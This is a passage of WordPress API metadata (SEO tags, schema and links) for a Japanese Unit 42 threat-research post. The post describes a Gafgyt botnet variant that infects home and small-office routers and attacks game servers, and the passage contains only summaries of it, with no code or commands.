42\u306fIoT\u30c7\u30d0\u30a4\u30b9\u306b\u611f\u67d3\u3059\u308b\u65b0\u305f\u306aGafgyt\u306e\u4e9c\u7a2e\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u540c\u4e9c\u7a2e\u306fZyxel\u3001Huawei\u3001Realtek\u306a\u3069\u3088\u304f\u77e5\u3089\u308c\u305f\u30e1\u30fc\u30ab\u30fc\u306e\u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u3001\u5225\u306e\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8JenX\u3068\u7af6\u5408\u3057\u307e\u3059\u3002\u4e21\u8005\u306f\u3068\u3082\u306b\u3001\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u7a81\u3044\u3066\u30a2\u30af\u30bb\u30b9\u3092\u53d6\u5f97\u3057\u3001\u30eb\u30fc\u30bf\u30fc\u3092\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u7d44\u307f\u5165\u308c\u3066\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\uff08Valve\u306eSource Engine\u304c\u7a3c\u50cd\u3059\u308b\u30b5\u30fc\u30d0\u30fc\uff09\u3092\u653b\u6483\u3001\u30b5\u30fc\u30d3\u30b9\u62d2\u5426\u3092\u5f15\u304d\u8d77\u3053\u3057\u307e\u3059\u3002\" \/>\n<meta property=\"og:url\" content=\"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/\" \/>\n<meta property=\"og:site_name\" content=\"Unit 42\" \/>\n<meta property=\"article:published_time\" content=\"2019-11-06T05:19:46+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2019-11-06T05:27:23+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/03_Malware_Category_1920x900.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"1920\" \/>\n\t<meta property=\"og:image:height\" content=\"900\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"author\" content=\"Asher Davila\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:title\" content=\"Gafgyt: \u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u653b\u6483\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\" \/>\n<meta name=\"twitter:description\" content=\"Unit 42\u306fIoT\u30c7\u30d0\u30a4\u30b9\u306b\u611f\u67d3\u3059\u308b\u65b0\u305f\u306aGafgyt\u306e\u4e9c\u7a2e\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u540c\u4e9c\u7a2e\u306fZyxel\u3001Huawei\u3001Realtek\u306a\u3069\u3088\u304f\u77e5\u3089\u308c\u305f\u30e1\u30fc\u30ab\u30fc\u306e\u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u3001\u5225\u306e\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8JenX\u3068\u7af6\u5408\u3057\u307e\u3059\u3002\u4e21\u8005\u306f\u3068\u3082\u306b\u3001\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u7a81\u3044\u3066\u30a2\u30af\u30bb\u30b9\u3092\u53d6\u5f97\u3057\u3001\u30eb\u30fc\u30bf\u30fc\u3092\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u7d44\u307f\u5165\u308c\u3066\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\uff08Valve\u306eSource Engine\u304c\u7a3c\u50cd\u3059\u308b\u30b5\u30fc\u30d0\u30fc\uff09\u3092\u653b\u6483\u3001\u30b5\u30fc\u30d3\u30b9\u62d2\u5426\u3092\u5f15\u304d\u8d77\u3053\u3057\u307e\u3059\u3002\" \/>\n<!-- \/ Yoast SEO Premium plugin. -->","yoast_head_json":{"title":"Gafgyt: \u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u653b\u6483\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8","description":"Unit 42\u306fIoT\u30c7\u30d0\u30a4\u30b9\u306b\u611f\u67d3\u3059\u308b\u65b0\u305f\u306aGafgyt\u306e\u4e9c\u7a2e\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u540c\u4e9c\u7a2e\u306fZyxel\u3001Huawei\u3001Realtek\u306a\u3069\u3088\u304f\u77e5\u3089\u308c\u305f\u30e1\u30fc\u30ab\u30fc\u306e\u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u3001\u5225\u306e\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8JenX\u3068\u7af6\u5408\u3057\u307e\u3059\u3002\u4e21\u8005\u306f\u3068\u3082\u306b\u3001\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u7a81\u3044\u3066\u30a2\u30af\u30bb\u30b9\u3092\u53d6\u5f97\u3057\u3001\u30eb\u30fc\u30bf\u30fc\u3092\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u7d44\u307f\u5165\u308c\u3066\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\uff08Valve\u306eSource Engine\u304c\u7a3c\u50cd\u3059\u308b\u30b5\u30fc\u30d0\u30fc\uff09\u3092\u653b\u6483\u3001\u30b5\u30fc\u30d3\u30b9\u62d2\u5426\u3092\u5f15\u304d\u8d77\u3053\u3057\u307e\u3059\u3002","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/","og_locale":"ja_JP","og_type":"article","og_title":"Gafgyt: \u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u653b\u6483\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8","og_description":"Unit 42\u306fIoT\u30c7\u30d0\u30a4\u30b9\u306b\u611f\u67d3\u3059\u308b\u65b0\u305f\u306aGafgyt\u306e\u4e9c\u7a2e\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u540c\u4e9c\u7a2e\u306fZyxel\u3001Huawei\u3001Realtek\u306a\u3069\u3088\u304f\u77e5\u3089\u308c\u305f\u30e1\u30fc\u30ab\u30fc\u306e\u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u3001\u5225\u306e\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8JenX\u3068\u7af6\u5408\u3057\u307e\u3059\u3002\u4e21\u8005\u306f\u3068\u3082\u306b\u3001\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u7a81\u3044\u3066\u30a2\u30af\u30bb\u30b9\u3092\u53d6\u5f97\u3057\u3001\u30eb\u30fc\u30bf\u30fc\u3092\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u7d44\u307f\u5165\u308c\u3066\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\uff08Valve\u306eSource Engine\u304c\u7a3c\u50cd\u3059\u308b\u30b5\u30fc\u30d0\u30fc\uff09\u3092\u653b\u6483\u3001\u30b5\u30fc\u30d3\u30b9\u62d2\u5426\u3092\u5f15\u304d\u8d77\u3053\u3057\u307e\u3059\u3002","og_url":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/","og_site_name":"Unit 42","article_published_time":"2019-11-06T05:19:46+00:00","article_modified_time":"2019-11-06T05:27:23+00:00","og_image":[{"width":1920,"height":900,"url":"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/03_Malware_Category_1920x900.jpg","type":"image\/jpeg"}],"author":"Asher Davila","twitter_card":"summary_large_image","twitter_title":"Gafgyt: \u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u653b\u6483\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8","twitter_description":"Unit 42\u306fIoT\u30c7\u30d0\u30a4\u30b9\u306b\u611f\u67d3\u3059\u308b\u65b0\u305f\u306aGafgyt\u306e\u4e9c\u7a2e\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u540c\u4e9c\u7a2e\u306fZyxel\u3001Huawei\u3001Realtek\u306a\u3069\u3088\u304f\u77e5\u3089\u308c\u305f\u30e1\u30fc\u30ab\u30fc\u306e\u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u3001\u5225\u306e\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8JenX\u3068\u7af6\u5408\u3057\u307e\u3059\u3002\u4e21\u8005\u306f\u3068\u3082\u306b\u3001\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u7a81\u3044\u3066\u30a2\u30af\u30bb\u30b9\u3092\u53d6\u5f97\u3057\u3001\u30eb\u30fc\u30bf\u30fc\u3092\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u7d44\u307f\u5165\u308c\u3066\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\uff08Valve\u306eSource Engine\u304c\u7a3c\u50cd\u3059\u308b\u30b5\u30fc\u30d0\u30fc\uff09\u3092\u653b\u6483\u3001\u30b5\u30fc\u30d3\u30b9\u62d2\u5426\u3092\u5f15\u304d\u8d77\u3053\u3057\u307e\u3059\u3002","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/#article","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/"},"author":{"name":"Asher Davila","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/907112932a1d41b66cc1e6773364ea4f"},"headline":"Gafgyt: \u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u653b\u6483\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8","datePublished":"2019-11-06T05:19:46+00:00","dateModified":"2019-11-06T05:27:23+00:00","mainEntityOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/"},"wordCount":557,"commentCount":0,"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/03_Malware_Category_1920x900.jpg","keywords":["botnet","DDoS","exploit kit","IoT","WiFi routers"],"articleSection":["Vulnerabilities","\u30b5\u30a4\u30d0\u30fc\u72af\u7f6a","\u8105\u5a01\u30ea\u30b5\u30fc\u30c1","\u8106\u5f31\u6027"],"inLanguage":"ja","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/","url":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/","name":"Gafgyt: \u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u653b\u6483\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8","isPartOf":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#website"},"primaryImageOfPage":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/#primaryimage"},"image":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/#primaryimage"},"thumbnailUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/03_Malware_Category_1920x900.jpg","datePublished":"2019-11-06T05:19:46+00:00","dateModified":"2019-11-06T05:27:23+00:00","author":{"@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/907112932a1d41b66cc1e6773364ea4f"},"description":"Unit 42\u306fIoT\u30c7\u30d0\u30a4\u30b9\u306b\u611f\u67d3\u3059\u308b\u65b0\u305f\u306aGafgyt\u306e\u4e9c\u7a2e\u3092\u767a\u898b\u3057\u307e\u3057\u305f\u3002\u540c\u4e9c\u7a2e\u306fZyxel\u3001Huawei\u3001Realtek\u306a\u3069\u3088\u304f\u77e5\u3089\u308c\u305f\u30e1\u30fc\u30ab\u30fc\u306e\u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u3001\u5225\u306e\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8JenX\u3068\u7af6\u5408\u3057\u307e\u3059\u3002\u4e21\u8005\u306f\u3068\u3082\u306b\u3001\u30ea\u30e2\u30fc\u30c8\u30b3\u30fc\u30c9\u5b9f\u884c\u30a8\u30af\u30b9\u30d7\u30ed\u30a4\u30c8\u3092\u7a81\u3044\u3066\u30a2\u30af\u30bb\u30b9\u3092\u53d6\u5f97\u3057\u3001\u30eb\u30fc\u30bf\u30fc\u3092\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8\u306b\u7d44\u307f\u5165\u308c\u3066\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\uff08Valve\u306eSource Engine\u304c\u7a3c\u50cd\u3059\u308b\u30b5\u30fc\u30d0\u30fc\uff09\u3092\u653b\u6483\u3001\u30b5\u30fc\u30d3\u30b9\u62d2\u5426\u3092\u5f15\u304d\u8d77\u3053\u3057\u307e\u3059\u3002","breadcrumb":{"@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/#breadcrumb"},"inLanguage":"ja","potentialAction":[{"@type":"ReadAction","target":["https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/"]}]},{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/#primaryimage","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/03_Malware_Category_1920x900.jpg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2024\/06\/03_Malware_Category_1920x900.jpg","width":1920,"height":900,"caption":"A laptop on a desk displaying a vibrant graphical interface with a circular red pattern, possibly representing cybersecurity or data analysis. The laptop is illuminated by the screen\u2019s glow in a dimly lit room, which also shows a blurred background suggesting a secondary monitor and small desk objects."},{"@type":"BreadcrumbList","@id":"https:\/\/unit42.paloaltonetworks.com\/ja\/home-small-office-wireless-routers-exploited-to-attack-gaming-servers\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/unit42.paloaltonetworks.com\/ja\/"},{"@type":"ListItem","position":2,"name":"Gafgyt: \u5c0f\u898f\u6a21\u30aa\u30d5\u30a3\u30b9\/\u30db\u30fc\u30e0\u7121\u7ddaLAN\u30eb\u30fc\u30bf\u30fc\u306b\u611f\u67d3\u3057\u30b2\u30fc\u30e0\u30b5\u30fc\u30d0\u30fc\u3092\u653b\u6483\u3059\u308b\u30dc\u30c3\u30c8\u30cd\u30c3\u30c8"}]},{"@type":"WebSite","@id":"https:\/\/unit42.paloaltonetworks.com\/#website","url":"https:\/\/unit42.paloaltonetworks.com\/","name":"Unit 42","description":"Palo Alto Networks","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/unit42.paloaltonetworks.com\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"ja"},{"@type":"Person","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/907112932a1d41b66cc1e6773364ea4f","name":"Asher Davila","image":{"@type":"ImageObject","inLanguage":"ja","@id":"https:\/\/unit42.paloaltonetworks.com\/#\/schema\/person\/image\/9213e49ea48b7676660bac40d05c9e3e","url":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","contentUrl":"https:\/\/origin-unit42.paloaltonetworks.com\/wp-content\/uploads\/2018\/11\/unit-news-meta.svg","caption":"Asher Davila"},"description":"Senior staff researcher, Palo Alto Networks","url":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/author\/asher-davila\/"}]}},"_links":{"self":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/100731","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/users\/328"}],"replies":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/comments?post=100731"}],"version-history":[{"count":9,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/100731\/revisions"}],"predecessor-version":[{"id":100767,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/posts\/100731\/revisions\/100767"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media\/134326"}],"wp:attachment":[{"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/media?parent=100731"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/categories?post=100731"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/tags?post=100731"},{"taxonomy":"product_categories","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/product_categories?post=100731"},{"taxonomy":"author","embeddable":true,"href":"https:\/\/origin-unit42.paloaltonetworks.com\/ja\/wp-json\/wp\/v2\/coauthors?post=100731"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}